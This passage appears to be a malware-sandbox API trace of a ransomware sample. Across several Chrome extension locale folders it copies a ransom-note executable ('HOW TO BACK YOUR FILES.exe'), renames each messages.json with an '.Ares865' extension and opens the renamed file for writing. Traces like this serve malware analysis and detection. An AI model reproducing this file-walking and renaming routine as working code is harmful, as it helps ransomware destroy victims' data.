Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.901] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=187) returned 1 [0101.904] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy" [0101.904] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy" [0101.904] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.904] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.905] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.905] GetLastError () returned 0x0 [0101.905] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.905] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.905] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.905] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.906] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.906] lstrlenW (lpString="messages.json") returned 13 [0101.906] lstrlenW (lpString="Ares865") returned 7 [0101.906] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.906] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.Ares865") returned 160 [0101.906] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.907] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=665) returned 1 [0101.913] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu" [0101.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu" [0101.913] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.913] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.914] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.914] GetLastError () returned 0x0 [0101.914] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.914] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.914] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.915] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.915] lstrlenW (lpString="messages.json") returned 13 [0101.915] lstrlenW (lpString="Ares865") returned 7 [0101.915] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.915] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.Ares865") returned 160 [0101.915] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.917] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=198) returned 1 [0101.919] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr" [0101.920] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr" [0101.920] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.920] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.920] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.921] GetLastError () returned 0x0 [0101.921] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.921] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.921] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.921] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.921] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.921] lstrlenW (lpString="messages.json") returned 13 [0101.921] lstrlenW (lpString="Ares865") returned 7 [0101.921] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.921] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.Ares865") returned 160 [0101.921] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.923] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=200) returned 1 [0101.926] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi" [0101.926] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi" [0101.927] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.927] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.927] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.927] GetLastError () returned 0x0 [0101.928] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.928] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.928] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.928] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.928] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.928] lstrlenW (lpString="messages.json") returned 13 [0101.928] lstrlenW (lpString="Ares865") returned 7 [0101.928] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.928] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.Ares865") returned 160 [0101.928] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.930] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=318) returned 1 [0101.933] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu" [0101.933] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu" [0101.934] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.934] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.934] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.934] GetLastError () returned 0x0 [0101.935] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.935] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8213e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8213e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.935] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.935] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.935] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") 